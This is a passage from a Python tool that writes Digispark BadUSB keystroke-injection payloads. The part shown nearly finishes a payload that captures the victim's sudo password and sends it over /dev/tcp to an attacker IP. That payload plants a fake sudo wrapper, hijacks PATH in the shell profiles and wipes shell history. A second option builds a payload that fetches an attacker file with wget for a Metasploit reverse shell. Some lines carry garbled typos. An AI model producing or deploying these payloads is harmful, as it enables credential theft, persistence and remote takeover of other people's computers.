f.write("DigiKeyboard.delay(100);\n") 554 | f.write('DigiKeyboard.print("echo "$USER:$pwd:valid" > /dev/tcp/' + IP + '/1337 ");\n') 555 | f.write("DigiKeyboard.delay(50);\n") 556 | f.write("DigiKeyboard.sendKeyStro)ke(KEY_ENTER);\n") 557 | f.write("DigiKeyboard.delay(100);\n") 558 | f.write('DigiKeyboard.print("echo "$pwd" | /usr/bin/sudo -S $@ ");\n') 559 | f.write("DigiKeyboard.delay(50);\n") 560 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 561 | f.write("DigiKeyboard.delay(100);\n") 562 | f.write('DigiKeyboard.print("fi");\n') 563 | f.write("DigiKeyboard.delay(50);\n") 564 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 565 | f.write("DigiKeyboard.delay(100);\n") 566 | f.write('DigiKeyboard.print("fi > ~/.config/sudo/sudo");\n') 567 | f.write("DigiKeyboard.delay(50);\n") 568 | 
f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 569 | f.write("DigiKeyboard.delay(100);\n") 570 | f.write('DigiKeyboard.print("chmod u+x ~/.config/sudo/sudo");\n') 571 | f.write("DigiKeyboard.delay(50);\n") 572 | f.write("DigiKeyboard.sendKeyStrso)ke(KEY_ENTER);\n") 573 | f.write("DigiKeyboard.delay(100);\n") 574 | f.write('DigiKeyboard.print("echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile");\n') 575 | f.write("DigiKeyboard.delay(50);\n") 576 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 577 | f.write("DigiKeyboard.delay(100);\n") 578 | f.write('DigiKeyboard.print("echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc");\n') 579 | f.write("DigiKeyboard.delay(50);\n") 580 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 581 | f.write("DigiKeyboard.delay(100);\n") 582 | f.write('DigiKeyboard.print("history -c && rm .bash_history && exit");\n') 583 | f.write("DigiKeyboard.delay(50);)\n") 584 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 585 | f.write("DigiKeyboard.delay(100);\n") 586 | f.write('DigiKeyboard.print("MOD_GUI_LEFT, KEY_Q");\n ') 587 | f.write("DigiKeyboard.delay(50);\n") 588 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 589 | f.write("} \n") 590 | f.close() 591 | time.sleep(1) 592 | print ('File Created -> '+name+'') 593 | time.sleep(1) 594 | print ('\n' + G + '[!]' + C + 'Starting Nc Server For Password File' + W) 595 | os.system("bash password.sh") 596 | #Option No. 2 597 | elif choice == '2': 598 | os.system("cls") 599 | shell = """ 600 | Reverse Shell 601 | """ 602 | print(C + shell + W) 603 | print ("") 604 | name = raw_input("[!] Enter The File Name -> ") 605 | url = raw_input("[!] 
Enter URL with Payload Name -> ") 606 | f = open("path"+name+".ino","w+") 607 | f.write('#include "DigiKeyboard.h" \n') 608 | f.write("void setup() { \n") 609 | f.write("} \n") 610 | f.write("void loop() {\n") 611 | f.write("DigiKeyboard.sendKeyStroke(0);\n") 612 | f.write("DigiKeyboard.sendKeyStroke(MOD_GUI_LEFT, KEY_SPACE);\n") 613 | f.write("DigiKeyboard.delay(500);\n") 614 | f.write('DigiKeyboard.print("Terminal");\n') 615 | f.write("DigiKeyboard.delay(50);") 616 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 617 | f.write("DigiKeyboard.delay(100);") 618 | f.write('DigiKeyboard.print("wget http://' + url + '");\n') 619 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 620 | f.write("DigiKeyboard.delay(50);\n") 621 | f.write('DigiKeyboard.println("exit");\n') 622 | f.write("DigiKeyboard.delay(50);\n") 623 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 624 | f.write("} \n") 625 | f.close() 626 | time.sleep(1) 627 | print ('File Created -> '+name+'') 628 | print ('\n' + R + 'Now Run Reverse Handler in Metasplpoit') 629 | print_menu() 630 | 631 | elif choice == '3': 632 | print ("Exit") 633 | exit() 634 | else: 635 | print("Wrong option selection. Enter any key to try again..") 636 | print_menu() 637 | 638 | try: 639 | print_menu() 640 | 641 | except KeyboardInterrupt: 642 | print ('\n' + R + '[!]' + C + ' Keyboard Interrupt.' + W) 643 | --------------------------------------------------------------------------------